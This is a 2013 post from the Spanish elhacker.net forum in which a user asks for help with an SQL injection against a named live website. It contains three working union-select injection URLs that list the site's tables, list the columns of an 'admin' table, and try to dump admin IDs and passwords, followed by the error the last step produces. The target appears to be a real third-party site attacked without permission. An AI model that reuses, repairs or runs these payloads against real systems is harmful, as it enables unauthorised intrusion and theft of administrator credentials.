Imprimir Página - Problema con inyección SQL

Hola a todos!

Estoy haciendo un trabajo sobre vulnerabilidades informáticas i ahora las estoy probando para ver su funcionamiento, he estado haciendo inyección SQL en una web i al principio todo iba perfecto, he podido ver los nombres de las tablas, he encontrado la de admin, he podido ver los nombres de las columnas, pero a la hora de mostrar la información que contiene la tabla me sale este error:

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /nfs/c01/h12/mnt/9330/domains/blamm.com/html/top10.php on line 17

A continuación os dejo los pasos que he seguido para llegar hasta donde estoy, si veis algun error decidmelo porfavorr.

Para ver el nombre de las tablas:

Código:

http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.tables+limit+0,1--

Para ver el nombre de las columnas:

Código:

http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.columns+where+table_name=char(97,100,109,105,110)+limit+0,1--

admin = 97,100,109,105,110

I finalmente para ver la información de la tabla (aquí es donde me da error):

Código:

http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,group_concat(admin_id,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+admin--

Porfavor ayudadmee!! ;D

Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: janisorna en 9 Julio 2013, 02:08 am